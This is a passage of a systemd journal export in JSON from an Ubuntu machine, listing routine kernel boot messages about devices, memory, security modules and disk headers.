"e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1112923", 
"MESSAGE" : "input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17f;b=e2b08827b5804427b422c10c84f1567e;m=573263;t=5bd16dd1ab1cb;x=68a985843a955b82", "__REALTIME_TIMESTAMP" : "1615280779997643", "__MONOTONIC_TIMESTAMP" : "5714531", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:00", "_UDEV_SYSNAME" : "00:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "1117456", "MESSAGE" : "rtc_cmos 00:00: RTC can wake from S4" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=180;b=e2b08827b5804427b422c10c84f1567e;m=573302;t=5bd16dd1ab26a;x=c6cc0e35801d1ce9", "__REALTIME_TIMESTAMP" : "1615280779997802", "__MONOTONIC_TIMESTAMP" : "5714690", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:00", "_UDEV_SYSNAME" : "00:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "1120562", "MESSAGE" : "rtc_cmos 00:00: rtc core: registered rtc_cmos as rtc0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=181;b=e2b08827b5804427b422c10c84f1567e;m=573384;t=5bd16dd1ab2eb;x=c4d65f02f5e85074", "__REALTIME_TIMESTAMP" : "1615280779997931", "__MONOTONIC_TIMESTAMP" : "5714820", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:00", "_UDEV_SYSNAME" : "00:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "1123947", "MESSAGE" : "rtc_cmos 00:00: alarms up to one 
day, y3k, 114 bytes nvram" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=182;b=e2b08827b5804427b422c10c84f1567e;m=573392;t=5bd16dd1ab2fa;x=2e98378bbae74b79", "__REALTIME_TIMESTAMP" : "1615280779997946", "__MONOTONIC_TIMESTAMP" : "5714834", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1127232", "MESSAGE" : "i2c /dev entries driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=183;b=e2b08827b5804427b422c10c84f1567e;m=57339e;t=5bd16dd1ab306;x=b16628e86e165900", "__REALTIME_TIMESTAMP" : "1615280779997958", "__MONOTONIC_TIMESTAMP" : "5714846", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1129173", "MESSAGE" : "device-mapper: uevent: version 1.0.3" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=184;b=e2b08827b5804427b422c10c84f1567e;m=5733aa;t=5bd16dd1ab312;x=58fad9fec424c6a4", "__REALTIME_TIMESTAMP" : "1615280779997970", "__MONOTONIC_TIMESTAMP" : "5714858", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1131565", "MESSAGE" : "device-mapper: ioctl: 4.37.0-ioctl (2017-09-20) initialised: dm-devel@redhat.com" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=185;b=e2b08827b5804427b422c10c84f1567e;m=5733b5;t=5bd16dd1ab31d;x=c07c443d3e16db99", "__REALTIME_TIMESTAMP" : "1615280779997981", "__MONOTONIC_TIMESTAMP" : "5714869", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : 
"0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1135720", "MESSAGE" : "ledtrig-cpu: registered to indicate activity on CPUs" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=186;b=e2b08827b5804427b422c10c84f1567e;m=5733c0;t=5bd16dd1ab328;x=6a7777c70ce3a255", "__REALTIME_TIMESTAMP" : "1615280779997992", "__MONOTONIC_TIMESTAMP" : "5714880", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1138945", "MESSAGE" : "NET: Registered protocol family 10" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=187;b=e2b08827b5804427b422c10c84f1567e;m=5733cb;t=5bd16dd1ab333;x=4be3aaf7e9240aee", "__REALTIME_TIMESTAMP" : "1615280779998003", "__MONOTONIC_TIMESTAMP" : "5714891", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1145234", "MESSAGE" : "Segment Routing with IPv6" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=188;b=e2b08827b5804427b422c10c84f1567e;m=5733d6;t=5bd16dd1ab33e;x=4640c378a5cdf6da", "__REALTIME_TIMESTAMP" : "1615280779998014", "__MONOTONIC_TIMESTAMP" : "5714902", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1147095", "MESSAGE" : "NET: Registered protocol family 17" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=189;b=e2b08827b5804427b422c10c84f1567e;m=5733e1;t=5bd16dd1ab349;x=767dc5bae120251e", 
"__REALTIME_TIMESTAMP" : "1615280779998025", "__MONOTONIC_TIMESTAMP" : "5714913", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1149474", "MESSAGE" : "Key type dns_resolver registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18a;b=e2b08827b5804427b422c10c84f1567e;m=5733f1;t=5bd16dd1ab358;x=dc645808a879f3b", "__REALTIME_TIMESTAMP" : "1615280779998040", "__MONOTONIC_TIMESTAMP" : "5714929", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1152099", "MESSAGE" : "mce: Using 10 MCE banks" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18b;b=e2b08827b5804427b422c10c84f1567e;m=5733fc;t=5bd16dd1ab364;x=548f413767b00380", "__REALTIME_TIMESTAMP" : "1615280779998052", "__MONOTONIC_TIMESTAMP" : "5714940", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1154159", "MESSAGE" : "RAS: Correctable Errors collector initialized." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18c;b=e2b08827b5804427b422c10c84f1567e;m=573407;t=5bd16dd1ab36f;x=373f9d3379613ea0", "__REALTIME_TIMESTAMP" : "1615280779998063", "__MONOTONIC_TIMESTAMP" : "5714951", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1157286", "MESSAGE" : "sched_clock: Marking stable (1157251439, 0)->(1571788225, -414536786)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18d;b=e2b08827b5804427b422c10c84f1567e;m=573412;t=5bd16dd1ab37a;x=8c48752968bc386e", "__REALTIME_TIMESTAMP" : "1615280779998074", "__MONOTONIC_TIMESTAMP" : "5714962", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1161722", "MESSAGE" : "registered taskstats version 1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18e;b=e2b08827b5804427b422c10c84f1567e;m=57341d;t=5bd16dd1ab385;x=20a0aa6d8fdeab14", "__REALTIME_TIMESTAMP" : "1615280779998085", "__MONOTONIC_TIMESTAMP" : "5714973", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1163542", "MESSAGE" : "Loading compiled-in X.509 certificates" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18f;b=e2b08827b5804427b422c10c84f1567e;m=573429;t=5bd16dd1ab390;x=364a7ceb72127fa7", "__REALTIME_TIMESTAMP" : "1615280779998096", "__MONOTONIC_TIMESTAMP" : "5714985", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", 
"SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1167803", "MESSAGE" : "Loaded X.509 cert 'Build time autogenerated kernel key: 9d88e3c0462fa0d2df2917e8bbfdfdd1c55d8ddc'" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=190;b=e2b08827b5804427b422c10c84f1567e;m=573433;t=5bd16dd1ab39b;x=a7649390f19a2916", "__REALTIME_TIMESTAMP" : "1615280779998107", "__MONOTONIC_TIMESTAMP" : "5714995", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1171911", "MESSAGE" : "zswap: loaded using pool lzo/zbud" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=191;b=e2b08827b5804427b422c10c84f1567e;m=57343e;t=5bd16dd1ab3a6;x=14cb07770d36fce", "__REALTIME_TIMESTAMP" : "1615280779998118", "__MONOTONIC_TIMESTAMP" : "5715006", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1179054", "MESSAGE" : "Key type big_key registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=192;b=e2b08827b5804427b422c10c84f1567e;m=573449;t=5bd16dd1ab3b1;x=84725ba8ef890781", "__REALTIME_TIMESTAMP" : "1615280779998129", "__MONOTONIC_TIMESTAMP" : "5715017", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1181159", "MESSAGE" : "Key type trusted registered" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=193;b=e2b08827b5804427b422c10c84f1567e;m=573457;t=5bd16dd1ab3be;x=8c35f3d6f37cf7a", "__REALTIME_TIMESTAMP" : "1615280779998142", "__MONOTONIC_TIMESTAMP" : "5715031", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1184702", "MESSAGE" : "Key type encrypted registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=194;b=e2b08827b5804427b422c10c84f1567e;m=573462;t=5bd16dd1ab3ca;x=c87a6c56a1a279ae", "__REALTIME_TIMESTAMP" : "1615280779998154", "__MONOTONIC_TIMESTAMP" : "5715042", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1186983", "MESSAGE" : "AppArmor: AppArmor sha1 policy hashing enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=195;b=e2b08827b5804427b422c10c84f1567e;m=57346d;t=5bd16dd1ab3d5;x=c957789a9634f928", "__REALTIME_TIMESTAMP" : "1615280779998165", "__MONOTONIC_TIMESTAMP" : "5715053", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1190009", "MESSAGE" : "ima: No TPM chip found, activating TPM-bypass! 
(rc=-19)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=196;b=e2b08827b5804427b422c10c84f1567e;m=573478;t=5bd16dd1ab3e0;x=adfc620004c800d3", "__REALTIME_TIMESTAMP" : "1615280779998176", "__MONOTONIC_TIMESTAMP" : "5715064", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1193151", "MESSAGE" : "ima: Allocated hash algorithm: sha1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=197;b=e2b08827b5804427b422c10c84f1567e;m=573483;t=5bd16dd1ab3eb;x=693f53aec40a6152", "__REALTIME_TIMESTAMP" : "1615280779998187", "__MONOTONIC_TIMESTAMP" : "5715075", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1195370", "MESSAGE" : "evm: HMAC attrs: 0x1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=198;b=e2b08827b5804427b422c10c84f1567e;m=57348e;t=5bd16dd1ab3f6;x=ab505d66e5946eb3", "__REALTIME_TIMESTAMP" : "1615280779998198", "__MONOTONIC_TIMESTAMP" : "5715086", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1212166", "MESSAGE" : " Magic number: 13:673:120" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=199;b=e2b08827b5804427b422c10c84f1567e;m=573546;t=5bd16dd1ab4ae;x=33380f962a41035e", "__REALTIME_TIMESTAMP" : "1615280779998382", "__MONOTONIC_TIMESTAMP" : "5715270", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "misc", "_KERNEL_DEVICE" : "c10:236", "_UDEV_DEVNODE" : "/dev/mapper/control", "_UDEV_SYSNAME" : "device-mapper", "_SOURCE_MONOTONIC_TIMESTAMP" : "1214311", "MESSAGE" : "misc device-mapper: hash matches" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19a;b=e2b08827b5804427b422c10c84f1567e;m=5735e0;t=5bd16dd1ab547;x=6ddee31668d859d8", "__REALTIME_TIMESTAMP" : "1615280779998535", "__MONOTONIC_TIMESTAMP" : "5715424", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:00", "_UDEV_SYSNAME" : "00:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "1216895", "MESSAGE" : "rtc_cmos 00:00: setting system clock to 2021-03-09 09:06:15 UTC (1615280775)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19b;b=e2b08827b5804427b422c10c84f1567e;m=5735f4;t=5bd16dd1ab55c;x=4565413a50e75f50", "__REALTIME_TIMESTAMP" : "1615280779998556", "__MONOTONIC_TIMESTAMP" : "5715444", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1221337", "MESSAGE" : "BIOS EDD facility v0.16 2004-Jun-25, 0 devices found" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19c;b=e2b08827b5804427b422c10c84f1567e;m=573601;t=5bd16dd1ab569;x=f4f41e03b396a3ad", "__REALTIME_TIMESTAMP" : "1615280779998569", "__MONOTONIC_TIMESTAMP" : "5715457", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", 
"_SOURCE_MONOTONIC_TIMESTAMP" : "1224355", "MESSAGE" : "EDD information not available." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19d;b=e2b08827b5804427b422c10c84f1567e;m=57360e;t=5bd16dd1ab575;x=329d3d8c40cf755c", "__REALTIME_TIMESTAMP" : "1615280779998581", "__MONOTONIC_TIMESTAMP" : "5715470", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1229389", "MESSAGE" : "Freeing unused kernel image memory: 2436K" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19e;b=e2b08827b5804427b422c10c84f1567e;m=57361a;t=5bd16dd1ab581;x=e986ddf95cc1e0d4", "__REALTIME_TIMESTAMP" : "1615280779998593", "__MONOTONIC_TIMESTAMP" : "5715482", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1236019", "MESSAGE" : "Write protecting the kernel read-only data: 20480k" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19f;b=e2b08827b5804427b422c10c84f1567e;m=573628;t=5bd16dd1ab58f;x=a7162108f59cf17e", "__REALTIME_TIMESTAMP" : "1615280779998607", "__MONOTONIC_TIMESTAMP" : "5715496", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1240612", "MESSAGE" : "Freeing unused kernel image memory: 2008K" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a0;b=e2b08827b5804427b422c10c84f1567e;m=57363e;t=5bd16dd1ab5a5;x=2e6670b63c08b1f0", "__REALTIME_TIMESTAMP" : "1615280779998629", "__MONOTONIC_TIMESTAMP" : "5715518", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1243751", "MESSAGE" : "Freeing unused kernel image memory: 1972K" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a1;b=e2b08827b5804427b422c10c84f1567e;m=573652;t=5bd16dd1ab5ba;x=dc19fed6f929eec8", "__REALTIME_TIMESTAMP" : "1615280779998650", "__MONOTONIC_TIMESTAMP" : "5715538", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1254068", "MESSAGE" : "x86/mm: Checked W+X mappings: passed, no W+X pages found." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a2;b=e2b08827b5804427b422c10c84f1567e;m=57366f;t=5bd16dd1ab5d6;x=6c443cca0ce6637f", "__REALTIME_TIMESTAMP" : "1615280779998678", "__MONOTONIC_TIMESTAMP" : "5715567", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1257536", "MESSAGE" : "x86/mm: Checking user space page tables" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a3;b=e2b08827b5804427b422c10c84f1567e;m=57368a;t=5bd16dd1ab5f1;x=a5a65394811d4696", "__REALTIME_TIMESTAMP" : "1615280779998705", "__MONOTONIC_TIMESTAMP" : "5715594", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/mm: Checked W+X mappings: passed, no W+X pages found.", "_SOURCE_MONOTONIC_TIMESTAMP" : "1267705" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a4;b=e2b08827b5804427b422c10c84f1567e;m=573696;t=5bd16dd1ab5fd;x=b489bb420b8ec40e", "__REALTIME_TIMESTAMP" : "1615280779998717", "__MONOTONIC_TIMESTAMP" : "5715606", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1405178", "MESSAGE" : "FDC 0 is a S82078B" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a5;b=e2b08827b5804427b422c10c84f1567e;m=5736a5;t=5bd16dd1ab60c;x=817de7ebebd1e132", "__REALTIME_TIMESTAMP" : "1615280779998732", "__MONOTONIC_TIMESTAMP" : "5715621", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "1432467", "MESSAGE" : "GPT:Primary header thinks Alt. header is not at the end of the disk." 
